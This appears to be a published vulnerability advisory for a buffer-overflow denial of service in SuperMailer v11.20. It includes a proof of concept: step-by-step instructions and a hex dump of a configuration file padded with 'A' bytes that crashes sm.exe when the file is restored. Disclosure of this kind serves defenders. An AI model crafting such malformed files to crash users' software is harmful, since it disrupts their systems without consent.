# Exploit Title: SuperMailer v11.20 - Buffer overflow DoS
# Exploit Author: Rafael Pedrero
# Discovery Date: 2021-02-07
# Vendor Homepage:
https://int.supermailer.de/download_newsletter_software.htm
# Software Link : https://int.supermailer.de/smintsw.zip /
https://int.supermailer.de/smintsw_x64.zip
# Tested Version: v11.20 32bit/64bit [11.20.0.2204]
# Tested on: Windows 7, 10
CVSS v3: 3.3
CVSS vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L
CWE: CWE-20
Vulnerability description: A vulnerability in Newsletter Software
SuperMailer v11.20 32bit/64bit [11.20.0.2204] could allow an attacker to
cause a process crash resulting in a Denial of service (DoS) condition for
the application on an affected system. The vulnerability exists due to
insufficient validation of certain elements with a configuration file
malformed. An attacker could exploit this vulnerability by sending a user a
malicious SMB (configuration file) file through a link or email attachment
and persuading the user to open the file with the affected software on the
local system. A successful exploit could allow the attacker to cause the
application to crash when trying to load the malicious file.
Proof of concept:
1.- Go to File -> Save program options...
2.- Save the file (default extension *.smb)
3.- Edit file and you introduce a lot of A in somewhere. Example: DoS.smb
file
Offset(h) 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F
00000000 10 03 00 00 00 00 00 00 A9 E5 7E 41 41 41 41 41 ........©å~AAAAA
00000010 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000020 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000030 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000040 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000050 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000060 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000070 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000080 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000090 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000000A0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000000B0 41 41 97 99 E5 40 00 00 00 00 00 00 00 00 00 00 AA—™å@..........
000000C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000000D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000000E0 00 00 00 00 00 00 6B 00 00 00 53 00 6F 00 66 00 ......k...S.o.f.
000000F0 74 00 77 00 61 00 72 00 65 00 5C 00 4D 00 69 00 t.w.a.r.e.\.M.i.
00000100 72 00 6B 00 6F 00 20 00 42 00 6F 00 65 00 65 00 r.k.o. .B.o.e.e.
00000110 72 00 20 00 53 00 6F 00 66 00 74 00 77 00 61 00 r. .S.o.f.t.w.a.
00000120 72 00 65 00 5C 00 53 00 75 00 70 00 65 00 72 00 r.e.\.S.u.p.e.r.
00000130 4D 00 61 00 69 00 6C 00 65 00 72 00 5C 00 54 00 M.a.i.l.e.r.\.T.
00000140 65 00 73 00 74 00 20 00 45 00 4D 00 61 00 69 00 e.s.t. .E.M.a.i.
00000150 6C 00 20 00 41 00 64 00 64 00 72 00 65 00 73 00 l. .A.d.d.r.e.s.
00000160 73 00 65 00 73 00 00 00 00 00 00 00 00 00 00 00 s.e.s...........
And save the file.
4.- Go to File -> Restore program options...
5.- The application "sm.exe" crash.
